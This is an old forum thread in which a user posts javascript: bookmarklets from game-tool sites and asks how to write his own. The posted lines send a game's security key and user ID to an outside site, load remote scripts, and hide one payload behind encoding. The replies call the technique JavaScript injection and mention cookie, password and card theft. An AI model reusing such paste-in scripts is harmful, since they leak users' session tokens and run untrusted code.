Jump to content

javascript copy paste script

devWhiz

By devWhiz
in Javascript Help

 Share

Recommended Posts

devWhiz Regular Member

devWhiz

Posted
Posted

can you guys point me in the right direction to where I could learn how to write a copy paste script

 

similar to this

 

http://mobstereffect.com/propertycalcfb


javascript: alert("The Mobsters Game should now take up the entire window.\n\t\t When window loads Follow Step4"); location.href="http://mobsters-fb-apache-dynamic-lb.playdom.com/prod_facebook/facebook/mobsters_v1/facebook_iframe.php?action=tab&target=3";

javascript: var a=SECURITY_KEY; var b=USER_ID; if(confirm("Success!!\nClick OK to sync your account with MobsterEffect.com")){ location.href="http://www.mobstereffect.com/syncfb.php?next=propertycalcfb&fid="+b+"&fkey="+a; }

javascript:function%20b(){a=document.createElement('script');a.src='http://mobstereffect.com/calc.js.php?next=propertycalc&';document.getElementsByTagName('body')[0].appendChild(a);}b();

 

also on

 

 

http://www.sumob.com/?i=iPlayCalculator

 


javascript:a=function(t,f,i,x,e,d){p=new Array();for(u=0;u<x.length;u+=2)p[t[u/2]]=x.substr(u,2);for(u=0;u<x.length/2;u++){q=p[u];if(p[u]+p[u+1]=='5c79'){q='5c'+i+f+d+'6e';u++;}if(p[u]+p[u+1]=='5c7a'){q='20';u++;}if(p[u]+p[u+1]=='5c78'){q='09';u++;}e+=i+f+d+q;}z=setInterval('y=setInterval(\''+e+';clearInterval(y);'+'\');clearInterval(z)')}('85/71/27/109/69/24/106/56/35/73/57/82/47/75/54/15/46/108/16/30/96/80/25/51/12/63/4/104/83/89/74/7/107/50/88/26/45/100/17/29/102/87/3/99/23/11/67/20/94/28/98/18/111/78/91/60/70/53/33/58/101/31/22/43/32/39/6/38/90/81/37/66/76/55/13/8/34/44/5/77/10/19/97/68/42/95/72/103/86/59/105/52/84/61/92/48/62/2/9/65/110/41/64/1/36/40/79/0/49/21/93/14/'.split('/'),'u','\\','2f2f6c6d70436e297273292f286d7464746f79613f6f68722e6363724a6f7565646354696e612e28684d6f4d646474706a642b61292e6c2e3a702e3b743d6e6d64656d746f6d61686f27626e636575623b70277465732f2e416161695373732772647427286c3d3d6545636473652e6f','','00')

javascript:function b(){d=document;d.body.appendChild(a=d.createElement('script'));a.src='http://sumob.com/JS/AMToolsO.js?'+Math.random()}b();

 

He encoded that,

 

and this

 

http://go4uteam.com/propcalc

 


javascript:function b(){a=document.createElement('script');a.src='http://go4uteam.com/js/calc.js?';document.getElementsByTagName('body')[0].appendChild(a);}b();

 

what these copy paste scripts do is, you open up the certain myspace application, put the code in the toolbar and hit enter, and it finds the tokens for the application and connects to their tools that they have on their site, where could I go to learn how to write these copy paste scripts to do the same thing and connect to my site to use my tools?

 

Thanks! :)

 

Link to comment
https://forums.phpfreaks.com/topic/239182-javascript-copy-paste-script/
Share on other sites
RussellReal Member

RussellReal

Posted
Posted

what you're referring to as "copy past scripts" is not really that, its regular old javascript, which is getting injected into the page, called "JavaScript Injection", or simply "JSI"..

 

This is technically a form of maliciousness, but it can only affect whatever is on the page at this moment, it can, however, trick the browser into referring the user to another page which requires referrers to match up, that amongst other things like ad blocking, AJAX Referrer spoofing..

 

Using somebody else's JSI could lead to: stealing sensitive information from cookies and password forms, snooping on the content of the page, credit card theft, amongst other things, especially with browsers like chrome automatically filling in credit card information on focus and selection of a credit-card related field..

 

 

but to get back on point about your question, can you make this? Sure, if you know anything about javascript..

 

The only real rule you need to remember about javascript injection.. Is.

 

Rule: If anything you put in the url, returns any data to the "JavaScript:" portion of the url, it will then try and redirect you to that page.. An example of BAD JSI

 

E.X.: javascript:(Math.random()*11);

 

that will send you to a page: "10" which will most likely be a blank page.. or page not found

 

GOOD JSI (lol, how ironic is that phrase)

 

E.X.: javascript:void(var x = 11, var y = Math.random() * x, alert("Random * "+x+" = "+y));

 

void() will always return nothing..

  • 2 months later...
TibTibs Newbie

TibTibs

Posted
Posted

This is technically a form of maliciousness, but it can only affect whatever is on the page at this moment, it can, however, trick the browser into referring the user to another page which requires referrers to match up, that amongst other things like ad blocking, AJAX Referrer spoofing..

 

Using somebody else's JSI could lead to: stealing sensitive information from cookies and password forms, snooping on the content of the page, credit card theft, amongst other things, especially with browsers like chrome automatically filling in credit card information on focus and selection of a credit-card related field..

 

 

On that note... There is also security in using JSI, for sites like mine, who help users by making tools for their game, it allows me to access their game security tokens and myspace ID, without directly asking for and using (and possibly storing) their myspace login. This allows for many useful things, such as calculating what it will take for a user to achieve a certain income within their game.

 

I do agree with you that there are many malicious sites and developers who use this for their benefit. On another note, if web browsers and developers were smart, they would store credit card numbers in a password field, and have a verify field, just like most sites do for a password. This way, when it is autofilled, even if someone tries to use JSI to take the CCN, it would just be a bunch of astrix.

 

Another couple options for JSI besides using the void() function are eval() which .. triggers a some virus programs, and just creating a blank function and running it... such as function b(){content to be run}b();

And last but not least, setInterval() and setTimeout() work as well.

  • 1 month later...
RussellReal Member

RussellReal

Posted
Posted

sorry for replying so late, been really busy lately.. I'd like to point out, that JSI on a password field, does yield the correct information, not asterisks, unless I read you wrong.

 

Again sorry late reply lol. *feels like a post necromancer*

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.